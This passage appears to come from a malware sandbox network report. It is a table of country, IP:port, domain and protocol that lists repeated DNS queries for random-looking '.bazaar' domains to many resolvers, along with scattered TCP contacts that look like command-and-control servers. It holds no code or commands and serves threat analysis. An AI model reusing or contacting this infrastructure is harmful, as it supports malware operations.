| FR | 51.255.211.146:53 | abfgikachgiq.bazaar | udp |
| GB | 159.89.249.249:53 | abfgikachgiq.bazaar | udp |
| GB | 104.238.186.189:53 | abfgikachgiq.bazaar | udp |
| IN | 139.59.23.241:53 | abfgikachgiq.bazaar | udp |
| IT | 193.183.98.66:53 | abfgikachgiq.bazaar | udp |
| IT | 94.177.171.127:53 | abfgikachgiq.bazaar | udp |
| JP | 45.63.124.65:53 | abfgikachgiq.bazaar | udp |
| LT | 212.24.98.54:53 | abfgikachgiq.bazaar | udp |
| MD | 178.17.170.179:53 | abfgikachgiq.bazaar | udp |
| NL | 185.208.208.141:53 | abfgikachgiq.bazaar | udp |
| NL | 82.196.9.45:53 | abfgikachgiq.bazaar | udp |
| NL | 146.185.176.36:53 | abfgikachgiq.bazaar | udp |
| SE | 89.35.39.64:53 | abfgikachgiq.bazaar | udp |
| RO | 89.18.27.167:53 | abfgikachgiq.bazaar | udp |
| RU | 77.73.68.161:53 | abfgikachgiq.bazaar | udp |
| RU | 91.217.137.37:53 | abfgikachgiq.bazaar | udp |
| RU | 185.117.154.144:53 | abfgikachgiq.bazaar | udp |
| SE | 176.126.70.119:53 | abfgikachgiq.bazaar | udp |
| SG | 139.99.96.146:53 | abfgikachgiq.bazaar | udp |
| UA | 217.12.210.54:53 | abfgikachgiq.bazaar | udp |
| GB | 185.164.136.225:53 | abfgikachgiq.bazaar | udp |
| US | 192.52.166.110:53 | abfgikachgiq.bazaar | udp |
| US | 63.231.92.27:53 | abfgikachgiq.bazaar | udp |
| CA | 66.70.211.246:53 | abfgikachgiq.bazaar | udp |
| US | 96.47.228.108:53 | abfgikachgiq.bazaar | udp |
| US | 45.32.160.206:53 | abfgikachgiq.bazaar | udp |
| US | 128.52.130.209:53 | abfgikachgiq.bazaar | udp |
| US | 35.196.105.24:53 | abfgikachgiq.bazaar | udp |
| US | 172.98.193.42:53 | abfgikachgiq.bazaar | udp |
| US | 162.248.241.94:53 | abfgikachgiq.bazaar | udp |
| US | 107.172.42.186:53 | abfgikachgiq.bazaar | udp |
| US | 167.99.153.82:53 | abfgikachgiq.bazaar | udp |
| US | 138.197.25.214:53 | abfgikachgiq.bazaar | udp |
| US | 69.164.196.21:53 | abfgikachgiq.bazaar | udp |
| FR | 51.254.25.115:53 | afehkkagghkq.bazaar | udp |
| IT | 193.183.98.66:53 | afehkkagghkq.bazaar | udp |
| RU | 91.217.137.37:53 | afehkkagghkq.bazaar | udp |
| FR | 87.98.175.85:53 | afehkkagghkq.bazaar | udp |
| AT | 185.121.177.177:53 | afehkkagghkq.bazaar | udp |
| ZA | 169.239.202.202:53 | afehkkagghkq.bazaar | udp |
| US | 198.251.90.143:53 | afehkkagghkq.bazaar | udp |
| AT | 5.132.191.104:53 | afehkkagghkq.bazaar | udp |
| AU | 111.67.20.8:53 | afehkkagghkq.bazaar | udp |
| AU | 163.53.248.170:53 | afehkkagghkq.bazaar | udp |
| CA | 142.4.204.111:53 | afehkkagghkq.bazaar | udp |
| CA | 142.4.205.47:53 | afehkkagghkq.bazaar | udp |
| CA | 158.69.239.167:53 | afehkkagghkq.bazaar | udp |
| CA | 104.37.195.178:53 | afehkkagghkq.bazaar | udp |
| CA | 192.99.85.244:53 | afehkkagghkq.bazaar | udp |
| CA | 158.69.160.164:53 | afehkkagghkq.bazaar | udp |
| CH | 46.28.207.199:53 | afehkkagghkq.bazaar | udp |
| CH | 31.171.251.118:53 | afehkkagghkq.bazaar | udp |
| CZ | 81.2.241.148:53 | afehkkagghkq.bazaar | udp |
| FR | 51.254.25.115:53 | afehkkagghkq.bazaar | udp |
| DE | 82.141.39.32:53 | afehkkagghkq.bazaar | udp |
| DE | 50.3.82.215:53 | afehkkagghkq.bazaar | udp |
| DE | 46.101.70.183:53 | afehkkagghkq.bazaar | udp |
| DE | 5.45.97.127:53 | afehkkagghkq.bazaar | udp |
| DE | 130.255.78.223:53 | afehkkagghkq.bazaar | udp |
| DE | 144.76.133.38:53 | afehkkagghkq.bazaar | udp |
| DE | 139.59.208.246:53 | afehkkagghkq.bazaar | udp |
| DE | 172.104.136.243:53 | afehkkagghkq.bazaar | udp |
| EC | 45.71.112.70:53 | afehkkagghkq.bazaar | udp |
| FR | 163.172.185.51:53 | afehkkagghkq.bazaar | udp |
| FR | 87.98.175.85:53 | afehkkagghkq.bazaar | udp |
| FR | 5.135.183.146:53 | afehkkagghkq.bazaar | udp |
| FR | 51.255.48.78:53 | afehkkagghkq.bazaar | udp |
| FR | 188.165.200.156:53 | afehkkagghkq.bazaar | udp |
| FR | 147.135.185.78:53 | afehkkagghkq.bazaar | udp |
| FR | 92.222.97.145:53 | afehkkagghkq.bazaar | udp |
| FR | 51.255.211.146:53 | afehkkagghkq.bazaar | udp |
| GB | 159.89.249.249:53 | afehkkagghkq.bazaar | udp |
| GB | 104.238.186.189:53 | afehkkagghkq.bazaar | udp |
| IN | 139.59.23.241:53 | afehkkagghkq.bazaar | udp |
| IT | 193.183.98.66:53 | afehkkagghkq.bazaar | udp |
| IT | 94.177.171.127:53 | afehkkagghkq.bazaar | udp |
| JP | 45.63.124.65:53 | afehkkagghkq.bazaar | udp |
| LT | 212.24.98.54:53 | afehkkagghkq.bazaar | udp |
| MD | 178.17.170.179:53 | afehkkagghkq.bazaar | udp |
| NL | 185.208.208.141:53 | afehkkagghkq.bazaar | udp |
| NL | 82.196.9.45:53 | afehkkagghkq.bazaar | udp |
| NL | 146.185.176.36:53 | afehkkagghkq.bazaar | udp |
| SE | 89.35.39.64:53 | afehkkagghkq.bazaar | udp |
| RO | 89.18.27.167:53 | afehkkagghkq.bazaar | udp |
| RU | 77.73.68.161:53 | afehkkagghkq.bazaar | udp |
| RU | 91.217.137.37:53 | afehkkagghkq.bazaar | udp |
| RU | 185.117.154.144:53 | afehkkagghkq.bazaar | udp |
| SE | 176.126.70.119:53 | afehkkagghkq.bazaar | udp |
| SG | 139.99.96.146:53 | afehkkagghkq.bazaar | udp |
| UA | 217.12.210.54:53 | afehkkagghkq.bazaar | udp |
| GB | 185.164.136.225:53 | afehkkagghkq.bazaar | udp |
| US | 192.52.166.110:53 | afehkkagghkq.bazaar | udp |
| US | 63.231.92.27:53 | afehkkagghkq.bazaar | udp |
| CA | 66.70.211.246:53 | afehkkagghkq.bazaar | udp |
| US | 96.47.228.108:53 | afehkkagghkq.bazaar | udp |
| US | 45.32.160.206:53 | afehkkagghkq.bazaar | udp |
| US | 128.52.130.209:53 | afehkkagghkq.bazaar | udp |
| US | 35.196.105.24:53 | afehkkagghkq.bazaar | udp |
| US | 172.98.193.42:53 | afehkkagghkq.bazaar | udp |
| US | 162.248.241.94:53 | afehkkagghkq.bazaar | udp |
| US | 107.172.42.186:53 | afehkkagghkq.bazaar | udp |
| US | 167.99.153.82:53 | afehkkagghkq.bazaar | udp |
| US | 138.197.25.214:53 | afehkkagghkq.bazaar | udp |
| US | 69.164.196.21:53 | afehkkagghkq.bazaar | udp |
| FR | 51.254.25.115:53 | dcfgilddhgir.bazaar | udp |
| IT | 193.183.98.66:53 | dcfgilddhgir.bazaar | udp |
| RU | 91.217.137.37:53 | dcfgilddhgir.bazaar | udp |
| FR | 87.98.175.85:53 | dcfgilddhgir.bazaar | udp |
| AT | 185.121.177.177:53 | dcfgilddhgir.bazaar | udp |
| ZA | 169.239.202.202:53 | dcfgilddhgir.bazaar | udp |
| FR | 37.187.72.193:8080 | tcp | |
| US | 198.251.90.143:53 | dcfgilddhgir.bazaar | udp |
| AT | 5.132.191.104:53 | dcfgilddhgir.bazaar | udp |
| AU | 111.67.20.8:53 | dcfgilddhgir.bazaar | udp |
| AU | 163.53.248.170:53 | dcfgilddhgir.bazaar | udp |
| CA | 142.4.204.111:53 | dcfgilddhgir.bazaar | udp |
| CA | 142.4.205.47:53 | dcfgilddhgir.bazaar | udp |
| CA | 158.69.239.167:53 | dcfgilddhgir.bazaar | udp |
| CA | 104.37.195.178:53 | dcfgilddhgir.bazaar | udp |
| AR | 190.2.31.172:80 | tcp | |
| CA | 192.99.85.244:53 | dcfgilddhgir.bazaar | udp |
| CA | 158.69.160.164:53 | dcfgilddhgir.bazaar | udp |
| CH | 46.28.207.199:53 | dcfgilddhgir.bazaar | udp |
| CH | 31.171.251.118:53 | dcfgilddhgir.bazaar | udp |
| CZ | 81.2.241.148:53 | dcfgilddhgir.bazaar | udp |
| FR | 51.254.25.115:53 | dcfgilddhgir.bazaar | udp |
| DE | 82.141.39.32:53 | dcfgilddhgir.bazaar | udp |
| DE | 50.3.82.215:53 | dcfgilddhgir.bazaar | udp |
| DE | 46.101.70.183:53 | dcfgilddhgir.bazaar | udp |
| DE | 5.45.97.127:53 | dcfgilddhgir.bazaar | udp |
| DE | 130.255.78.223:53 | dcfgilddhgir.bazaar | udp |
| DE | 144.76.133.38:53 | dcfgilddhgir.bazaar | udp |
| DE | 139.59.208.246:53 | dcfgilddhgir.bazaar | udp |
| DE | 172.104.136.243:53 | dcfgilddhgir.bazaar | udp |
| EC | 45.71.112.70:53 | dcfgilddhgir.bazaar | udp |
| FR | 163.172.185.51:53 | dcfgilddhgir.bazaar | udp |
| FR | 87.98.175.85:53 | dcfgilddhgir.bazaar | udp |
| FR | 5.135.183.146:53 | dcfgilddhgir.bazaar | udp |
| FR | 51.255.48.78:53 | dcfgilddhgir.bazaar | udp |
| FR | 188.165.200.156:53 | dcfgilddhgir.bazaar | udp |
| FR | 147.135.185.78:53 | dcfgilddhgir.bazaar | udp |
| FR | 92.222.97.145:53 | dcfgilddhgir.bazaar | udp |
| FR | 51.255.211.146:53 | dcfgilddhgir.bazaar | udp |
| GB | 159.89.249.249:53 | dcfgilddhgir.bazaar | udp |
| GB | 104.238.186.189:53 | dcfgilddhgir.bazaar | udp |
| IN | 139.59.23.241:53 | dcfgilddhgir.bazaar | udp |
| IT | 193.183.98.66:53 | dcfgilddhgir.bazaar | udp |
| IT | 94.177.171.127:53 | dcfgilddhgir.bazaar | udp |
| JP | 45.63.124.65:53 | dcfgilddhgir.bazaar | udp |
| LT | 212.24.98.54:53 | dcfgilddhgir.bazaar | udp |
| MD | 178.17.170.179:53 | dcfgilddhgir.bazaar | udp |
| NL | 185.208.208.141:53 | dcfgilddhgir.bazaar | udp |
| NL | 82.196.9.45:53 | dcfgilddhgir.bazaar | udp |
| NL | 146.185.176.36:53 | dcfgilddhgir.bazaar | udp |
| SE | 89.35.39.64:53 | dcfgilddhgir.bazaar | udp |
| RO | 89.18.27.167:53 | dcfgilddhgir.bazaar | udp |
| RU | 77.73.68.161:53 | dcfgilddhgir.bazaar | udp |
| RU | 91.217.137.37:53 | dcfgilddhgir.bazaar | udp |
| RU | 185.117.154.144:53 | dcfgilddhgir.bazaar | udp |
| SE | 176.126.70.119:53 | dcfgilddhgir.bazaar | udp |
| SG | 139.99.96.146:53 | dcfgilddhgir.bazaar | udp |
| UA | 217.12.210.54:53 | dcfgilddhgir.bazaar | udp |
| GB | 185.164.136.225:53 | dcfgilddhgir.bazaar | udp |
| US | 192.52.166.110:53 | dcfgilddhgir.bazaar | udp |
| US | 63.231.92.27:53 | dcfgilddhgir.bazaar | udp |
| CA | 66.70.211.246:53 | dcfgilddhgir.bazaar | udp |
| US | 96.47.228.108:53 | dcfgilddhgir.bazaar | udp |
| US | 45.32.160.206:53 | dcfgilddhgir.bazaar | udp |
| US | 128.52.130.209:53 | dcfgilddhgir.bazaar | udp |
| US | 35.196.105.24:53 | dcfgilddhgir.bazaar | udp |
| US | 172.98.193.42:53 | dcfgilddhgir.bazaar | udp |
| US | 162.248.241.94:53 | dcfgilddhgir.bazaar | udp |
| US | 107.172.42.186:53 | dcfgilddhgir.bazaar | udp |
| US | 167.99.153.82:53 | dcfgilddhgir.bazaar | udp |
| US | 138.197.25.214:53 | dcfgilddhgir.bazaar | udp |
| US | 69.164.196.21:53 | dcfgilddhgir.bazaar | udp |
| FR | 51.254.25.115:53 | cfgehlcgiehr.bazaar | udp |
| IT | 193.183.98.66:53 | cfgehlcgiehr.bazaar | udp |
| RU | 91.217.137.37:53 | cfgehlcgiehr.bazaar | udp |
| FR | 87.98.175.85:53 | cfgehlcgiehr.bazaar | udp |
| AT | 185.121.177.177:53 | cfgehlcgiehr.bazaar | udp |
| ZA | 169.239.202.202:53 | cfgehlcgiehr.bazaar | udp |
| US | 75.182.220.196:2222 | tcp | |
| US | 198.251.90.143:53 | cfgehlcgiehr.bazaar | udp |
| AT | 5.132.191.104:53 | cfgehlcgiehr.bazaar | udp |
| AU | 111.67.20.8:53 | cfgehlcgiehr.bazaar | udp |
| AU | 163.53.248.170:53 | cfgehlcgiehr.bazaar | udp |
| CA | 142.4.204.111:53 | cfgehlcgiehr.bazaar | udp |
| CA | 142.4.205.47:53 | cfgehlcgiehr.bazaar | udp |
| CA | 158.69.239.167:53 | cfgehlcgiehr.bazaar | udp |
| CA | 104.37.195.178:53 | cfgehlcgiehr.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| CA | 192.99.85.244:53 | cfgehlcgiehr.bazaar | udp |
| CA | 158.69.160.164:53 | cfgehlcgiehr.bazaar | udp |
| CH | 46.28.207.199:53 | cfgehlcgiehr.bazaar | udp |
| CH | 31.171.251.118:53 | cfgehlcgiehr.bazaar | udp |
| CZ | 81.2.241.148:53 | cfgehlcgiehr.bazaar | udp |
| FR | 51.254.25.115:53 | cfgehlcgiehr.bazaar | udp |
| DE | 82.141.39.32:53 | cfgehlcgiehr.bazaar | udp |
| DE | 50.3.82.215:53 | cfgehlcgiehr.bazaar | udp |
| DE | 46.101.70.183:53 | cfgehlcgiehr.bazaar | udp |
| DE | 5.45.97.127:53 | cfgehlcgiehr.bazaar | udp |
| DE | 130.255.78.223:53 | cfgehlcgiehr.bazaar | udp |
| DE | 144.76.133.38:53 | cfgehlcgiehr.bazaar | udp |
| DE | 139.59.208.246:53 | cfgehlcgiehr.bazaar | udp |
| DE | 172.104.136.243:53 | cfgehlcgiehr.bazaar | udp |
| EC | 45.71.112.70:53 | cfgehlcgiehr.bazaar | udp |
| FR | 163.172.185.51:53 | cfgehlcgiehr.bazaar | udp |
| FR | 87.98.175.85:53 | cfgehlcgiehr.bazaar | udp |
| FR | 5.135.183.146:53 | cfgehlcgiehr.bazaar | udp |
| FR | 51.255.48.78:53 | cfgehlcgiehr.bazaar | udp |
| FR | 188.165.200.156:53 | cfgehlcgiehr.bazaar | udp |
| FR | 147.135.185.78:53 | cfgehlcgiehr.bazaar | udp |
| FR | 92.222.97.145:53 | cfgehlcgiehr.bazaar | udp |
| FR | 51.255.211.146:53 | cfgehlcgiehr.bazaar | udp |
| GB | 159.89.249.249:53 | cfgehlcgiehr.bazaar | udp |
| GB | 104.238.186.189:53 | cfgehlcgiehr.bazaar | udp |
| IN | 139.59.23.241:53 | cfgehlcgiehr.bazaar | udp |
| IT | 193.183.98.66:53 | cfgehlcgiehr.bazaar | udp |
| IT | 94.177.171.127:53 | cfgehlcgiehr.bazaar | udp |
| JP | 45.63.124.65:53 | cfgehlcgiehr.bazaar | udp |
| LT | 212.24.98.54:53 | cfgehlcgiehr.bazaar | udp |
| MD | 178.17.170.179:53 | cfgehlcgiehr.bazaar | udp |
| NL | 185.208.208.141:53 | cfgehlcgiehr.bazaar | udp |
| NL | 82.196.9.45:53 | cfgehlcgiehr.bazaar | udp |
| NL | 146.185.176.36:53 | cfgehlcgiehr.bazaar | udp |
| SE | 89.35.39.64:53 | cfgehlcgiehr.bazaar | udp |
| RO | 89.18.27.167:53 | cfgehlcgiehr.bazaar | udp |
| RU | 77.73.68.161:53 | cfgehlcgiehr.bazaar | udp |
| RU | 91.217.137.37:53 | cfgehlcgiehr.bazaar | udp |
| RU | 185.117.154.144:53 | cfgehlcgiehr.bazaar | udp |
| SE | 176.126.70.119:53 | cfgehlcgiehr.bazaar | udp |
| SG | 139.99.96.146:53 | cfgehlcgiehr.bazaar | udp |
| UA | 217.12.210.54:53 | cfgehlcgiehr.bazaar | udp |
| GB | 185.164.136.225:53 | cfgehlcgiehr.bazaar | udp |
| US | 192.52.166.110:53 | cfgehlcgiehr.bazaar | udp |
| US | 63.231.92.27:53 | cfgehlcgiehr.bazaar | udp |
| CA | 66.70.211.246:53 | cfgehlcgiehr.bazaar | udp |
| US | 96.47.228.108:53 | cfgehlcgiehr.bazaar | udp |
| US | 45.32.160.206:53 | cfgehlcgiehr.bazaar | udp |
| US | 128.52.130.209:53 | cfgehlcgiehr.bazaar | udp |
| US | 35.196.105.24:53 | cfgehlcgiehr.bazaar | udp |
| US | 172.98.193.42:53 | cfgehlcgiehr.bazaar | udp |
| US | 162.248.241.94:53 | cfgehlcgiehr.bazaar | udp |
| US | 107.172.42.186:53 | cfgehlcgiehr.bazaar | udp |
| US | 167.99.153.82:53 | cfgehlcgiehr.bazaar | udp |
| US | 138.197.25.214:53 | cfgehlcgiehr.bazaar | udp |
| US | 69.164.196.21:53 | cfgehlcgiehr.bazaar | udp |
| FR | 51.254.25.115:53 | dadghkdbfghq.bazaar | udp |
| IT | 193.183.98.66:53 | dadghkdbfghq.bazaar | udp |
| RU | 91.217.137.37:53 | dadghkdbfghq.bazaar | udp |
| FR | 87.98.175.85:53 | dadghkdbfghq.bazaar | udp |
| US | 75.182.220.196:2222 | tcp | |
| AT | 185.121.177.177:53 | dadghkdbfghq.bazaar | udp |
| ZA | 169.239.202.202:53 | dadghkdbfghq.bazaar | udp |
| US | 198.251.90.143:53 | dadghkdbfghq.bazaar | udp |
| US | 34.66.135.39:80 | www.homedecorhandicrafts.com | tcp |
| AT | 5.132.191.104:53 | dadghkdbfghq.bazaar | udp |
| AU | 111.67.20.8:53 | dadghkdbfghq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| AU | 163.53.248.170:53 | dadghkdbfghq.bazaar | udp |
| CA | 142.4.204.111:53 | dadghkdbfghq.bazaar | udp |
| CA | 142.4.205.47:53 | dadghkdbfghq.bazaar | udp |
| CA | 158.69.239.167:53 | dadghkdbfghq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| CA | 104.37.195.178:53 | dadghkdbfghq.bazaar | udp |
| CA | 192.99.85.244:53 | dadghkdbfghq.bazaar | udp |
| CA | 158.69.160.164:53 | dadghkdbfghq.bazaar | udp |
| CH | 46.28.207.199:53 | dadghkdbfghq.bazaar | udp |
| CH | 31.171.251.118:53 | dadghkdbfghq.bazaar | udp |
| CZ | 81.2.241.148:53 | dadghkdbfghq.bazaar | udp |
| FR | 51.254.25.115:53 | dadghkdbfghq.bazaar | udp |
| DE | 82.141.39.32:53 | dadghkdbfghq.bazaar | udp |
| DE | 50.3.82.215:53 | dadghkdbfghq.bazaar | udp |
| SG | 172.104.169.32:8080 | tcp | |
| DE | 46.101.70.183:53 | dadghkdbfghq.bazaar | udp |
| DE | 5.45.97.127:53 | dadghkdbfghq.bazaar | udp |
| DE | 130.255.78.223:53 | dadghkdbfghq.bazaar | udp |
| DE | 144.76.133.38:53 | dadghkdbfghq.bazaar | udp |
| DE | 139.59.208.246:53 | dadghkdbfghq.bazaar | udp |
| US | 75.182.220.196:2222 | tcp | |
| DE | 172.104.136.243:53 | dadghkdbfghq.bazaar | udp |
| EC | 45.71.112.70:53 | dadghkdbfghq.bazaar | udp |
| FR | 163.172.185.51:53 | dadghkdbfghq.bazaar | udp |
| FR | 87.98.175.85:53 | dadghkdbfghq.bazaar | udp |
| FR | 5.135.183.146:53 | dadghkdbfghq.bazaar | udp |
| ZA | 41.60.200.34:80 | tcp | |
| FR | 51.255.48.78:53 | dadghkdbfghq.bazaar | udp |
| FR | 188.165.200.156:53 | dadghkdbfghq.bazaar | udp |
| FR | 147.135.185.78:53 | dadghkdbfghq.bazaar | udp |
| FR | 92.222.97.145:53 | dadghkdbfghq.bazaar | udp |
| FR | 51.255.211.146:53 | dadghkdbfghq.bazaar | udp |
| GB | 159.89.249.249:53 | dadghkdbfghq.bazaar | udp |
| GB | 104.238.186.189:53 | dadghkdbfghq.bazaar | udp |
| US | 72.135.200.124:80 | tcp | |
| IN | 139.59.23.241:53 | dadghkdbfghq.bazaar | udp |
| IT | 193.183.98.66:53 | dadghkdbfghq.bazaar | udp |
| IT | 94.177.171.127:53 | dadghkdbfghq.bazaar | udp |
| JP | 45.63.124.65:53 | dadghkdbfghq.bazaar | udp |
| LT | 212.24.98.54:53 | dadghkdbfghq.bazaar | udp |
| US | 75.182.220.196:2222 | tcp | |
| MD | 178.17.170.179:53 | dadghkdbfghq.bazaar | udp |
| NL | 185.208.208.141:53 | dadghkdbfghq.bazaar | udp |
| NL | 82.196.9.45:53 | dadghkdbfghq.bazaar | udp |
| NL | 146.185.176.36:53 | dadghkdbfghq.bazaar | udp |
| SE | 89.35.39.64:53 | dadghkdbfghq.bazaar | udp |
| RO | 89.18.27.167:53 | dadghkdbfghq.bazaar | udp |
| RU | 77.73.68.161:53 | dadghkdbfghq.bazaar | udp |
| RU | 91.217.137.37:53 | dadghkdbfghq.bazaar | udp |
| RU | 185.117.154.144:53 | dadghkdbfghq.bazaar | udp |
| SE | 176.126.70.119:53 | dadghkdbfghq.bazaar | udp |
| SG | 139.99.96.146:53 | dadghkdbfghq.bazaar | udp |
| UA | 217.12.210.54:53 | dadghkdbfghq.bazaar | udp |
| GB | 185.164.136.225:53 | dadghkdbfghq.bazaar | udp |
| US | 192.52.166.110:53 | dadghkdbfghq.bazaar | udp |
| US | 63.231.92.27:53 | dadghkdbfghq.bazaar | udp |
| CA | 66.70.211.246:53 | dadghkdbfghq.bazaar | udp |
| US | 96.47.228.108:53 | dadghkdbfghq.bazaar | udp |
| US | 45.32.160.206:53 | dadghkdbfghq.bazaar | udp |
| US | 128.52.130.209:53 | dadghkdbfghq.bazaar | udp |
| US | 35.196.105.24:53 | dadghkdbfghq.bazaar | udp |
| US | 172.98.193.42:53 | dadghkdbfghq.bazaar | udp |
| US | 162.248.241.94:53 | dadghkdbfghq.bazaar | udp |
| US | 107.172.42.186:53 | dadghkdbfghq.bazaar | udp |
| US | 167.99.153.82:53 | dadghkdbfghq.bazaar | udp |
| US | 138.197.25.214:53 | dadghkdbfghq.bazaar | udp |
| US | 69.164.196.21:53 | dadghkdbfghq.bazaar | udp |
| FR | 51.254.25.115:53 | _bghjkzcihjq.bazaar | udp |
| IT | 193.183.98.66:53 | _bghjkzcihjq.bazaar | udp |
| RU | 91.217.137.37:53 | _bghjkzcihjq.bazaar | udp |
| FR | 87.98.175.85:53 | _bghjkzcihjq.bazaar | udp |
| AT | 185.121.177.177:53 | _bghjkzcihjq.bazaar | udp |
| ZA | 169.239.202.202:53 | _bghjkzcihjq.bazaar | udp |
| US | 198.251.90.143:53 | _bghjkzcihjq.bazaar | udp |
| AT | 5.132.191.104:53 | _bghjkzcihjq.bazaar | udp |
| AU | 111.67.20.8:53 | _bghjkzcihjq.bazaar | udp |
| AU | 163.53.248.170:53 | _bghjkzcihjq.bazaar | udp |
| CA | 142.4.204.111:53 | _bghjkzcihjq.bazaar | udp |
| CA | 142.4.205.47:53 | _bghjkzcihjq.bazaar | udp |
| CA | 158.69.239.167:53 | _bghjkzcihjq.bazaar | udp |
| CA | 104.37.195.178:53 | _bghjkzcihjq.bazaar | udp |
| CA | 192.99.85.244:53 | _bghjkzcihjq.bazaar | udp |
| CA | 158.69.160.164:53 | _bghjkzcihjq.bazaar | udp |
| CH | 46.28.207.199:53 | _bghjkzcihjq.bazaar | udp |
| CH | 31.171.251.118:53 | _bghjkzcihjq.bazaar | udp |
| CZ | 81.2.241.148:53 | _bghjkzcihjq.bazaar | udp |
| FR | 51.254.25.115:53 | _bghjkzcihjq.bazaar | udp |
| DE | 82.141.39.32:53 | _bghjkzcihjq.bazaar | udp |
| DE | 50.3.82.215:53 | _bghjkzcihjq.bazaar | udp |
| DE | 46.101.70.183:53 | _bghjkzcihjq.bazaar | udp |
| DE | 5.45.97.127:53 | _bghjkzcihjq.bazaar | udp |
| DE | 130.255.78.223:53 | _bghjkzcihjq.bazaar | udp |
| DE | 144.76.133.38:53 | _bghjkzcihjq.bazaar | udp |
| DE | 139.59.208.246:53 | _bghjkzcihjq.bazaar | udp |
| DE | 172.104.136.243:53 | _bghjkzcihjq.bazaar | udp |
| EC | 45.71.112.70:53 | _bghjkzcihjq.bazaar | udp |
| FR | 163.172.185.51:53 | _bghjkzcihjq.bazaar | udp |
| FR | 87.98.175.85:53 | _bghjkzcihjq.bazaar | udp |
| FR | 5.135.183.146:53 | _bghjkzcihjq.bazaar | udp |
| FR | 51.255.48.78:53 | _bghjkzcihjq.bazaar | udp |
| FR | 188.165.200.156:53 | _bghjkzcihjq.bazaar | udp |
| FR | 147.135.185.78:53 | _bghjkzcihjq.bazaar | udp |
| FR | 92.222.97.145:53 | _bghjkzcihjq.bazaar | udp |
| FR | 51.255.211.146:53 | _bghjkzcihjq.bazaar | udp |
| GB | 159.89.249.249:53 | _bghjkzcihjq.bazaar | udp |
| GB | 104.238.186.189:53 | _bghjkzcihjq.bazaar | udp |
| IN | 139.59.23.241:53 | _bghjkzcihjq.bazaar | udp |
| IT | 193.183.98.66:53 | _bghjkzcihjq.bazaar | udp |
| IT | 94.177.171.127:53 | _bghjkzcihjq.bazaar | udp |
| JP | 45.63.124.65:53 | _bghjkzcihjq.bazaar | udp |
| LT | 212.24.98.54:53 | _bghjkzcihjq.bazaar | udp |
| MD | 178.17.170.179:53 | _bghjkzcihjq.bazaar | udp |
| NL | 185.208.208.141:53 | _bghjkzcihjq.bazaar | udp |
| NL | 82.196.9.45:53 | _bghjkzcihjq.bazaar | udp |
| NL | 146.185.176.36:53 | _bghjkzcihjq.bazaar | udp |
| SE | 89.35.39.64:53 | _bghjkzcihjq.bazaar | udp |
| RO | 89.18.27.167:53 | _bghjkzcihjq.bazaar | udp |
| RU | 77.73.68.161:53 | _bghjkzcihjq.bazaar | udp |
| RU | 91.217.137.37:53 | _bghjkzcihjq.bazaar | udp |
| RU | 185.117.154.144:53 | _bghjkzcihjq.bazaar | udp |
| SE | 176.126.70.119:53 | _bghjkzcihjq.bazaar | udp |
| SG | 139.99.96.146:53 | _bghjkzcihjq.bazaar | udp |
| UA | 217.12.210.54:53 | _bghjkzcihjq.bazaar | udp |
| GB | 185.164.136.225:53 | _bghjkzcihjq.bazaar | udp |
| US | 192.52.166.110:53 | _bghjkzcihjq.bazaar | udp |
| US | 63.231.92.27:53 | _bghjkzcihjq.bazaar | udp |
| CA | 66.70.211.246:53 | _bghjkzcihjq.bazaar | udp |
| US | 96.47.228.108:53 | _bghjkzcihjq.bazaar | udp |
| US | 45.32.160.206:53 | _bghjkzcihjq.bazaar | udp |
| US | 128.52.130.209:53 | _bghjkzcihjq.bazaar | udp |
| US | 35.196.105.24:53 | _bghjkzcihjq.bazaar | udp |
| US | 172.98.193.42:53 | _bghjkzcihjq.bazaar | udp |
| US | 162.248.241.94:53 | _bghjkzcihjq.bazaar | udp |
| US | 107.172.42.186:53 | _bghjkzcihjq.bazaar | udp |
| US | 167.99.153.82:53 | _bghjkzcihjq.bazaar | udp |
| US | 138.197.25.214:53 | _bghjkzcihjq.bazaar | udp |
| US | 69.164.196.21:53 | _bghjkzcihjq.bazaar | udp |
| FR | 51.254.25.115:53 | ^afiiizbhiio.bazaar | udp |
| IT | 193.183.98.66:53 | ^afiiizbhiio.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| RU | 91.217.137.37:53 | ^afiiizbhiio.bazaar | udp |
| FR | 87.98.175.85:53 | ^afiiizbhiio.bazaar | udp |
| AT | 185.121.177.177:53 | ^afiiizbhiio.bazaar | udp |
| ZA | 169.239.202.202:53 | ^afiiizbhiio.bazaar | udp |
| US | 198.251.90.143:53 | ^afiiizbhiio.bazaar | udp |
| AT | 5.132.191.104:53 | ^afiiizbhiio.bazaar | udp |
| AU | 111.67.20.8:53 | ^afiiizbhiio.bazaar | udp |
| AU | 163.53.248.170:53 | ^afiiizbhiio.bazaar | udp |
| CA | 142.4.204.111:53 | ^afiiizbhiio.bazaar | udp |
| CA | 142.4.205.47:53 | ^afiiizbhiio.bazaar | udp |
| CA | 158.69.239.167:53 | ^afiiizbhiio.bazaar | udp |
| FR | 193.248.44.2:2222 | tcp | |
| CA | 104.37.195.178:53 | ^afiiizbhiio.bazaar | udp |
| CA | 192.99.85.244:53 | ^afiiizbhiio.bazaar | udp |
| CA | 158.69.160.164:53 | ^afiiizbhiio.bazaar | udp |
| CH | 46.28.207.199:53 | ^afiiizbhiio.bazaar | udp |
| CH | 31.171.251.118:53 | ^afiiizbhiio.bazaar | udp |
| CZ | 81.2.241.148:53 | ^afiiizbhiio.bazaar | udp |
| FR | 51.254.25.115:53 | ^afiiizbhiio.bazaar | udp |
| DE | 82.141.39.32:53 | ^afiiizbhiio.bazaar | udp |
| DE | 50.3.82.215:53 | ^afiiizbhiio.bazaar | udp |
| DE | 46.101.70.183:53 | ^afiiizbhiio.bazaar | udp |
| DE | 5.45.97.127:53 | ^afiiizbhiio.bazaar | udp |
| DE | 130.255.78.223:53 | ^afiiizbhiio.bazaar | udp |
| DE | 144.76.133.38:53 | ^afiiizbhiio.bazaar | udp |
| DE | 139.59.208.246:53 | ^afiiizbhiio.bazaar | udp |
| MX | 187.162.248.237:80 | tcp | |
| DE | 172.104.136.243:53 | ^afiiizbhiio.bazaar | udp |
| EC | 45.71.112.70:53 | ^afiiizbhiio.bazaar | udp |
| FR | 163.172.185.51:53 | ^afiiizbhiio.bazaar | udp |
| FR | 87.98.175.85:53 | ^afiiizbhiio.bazaar | udp |
| AU | 139.130.242.43:80 | tcp | |
| FR | 5.135.183.146:53 | ^afiiizbhiio.bazaar | udp |
| FR | 51.255.48.78:53 | ^afiiizbhiio.bazaar | udp |
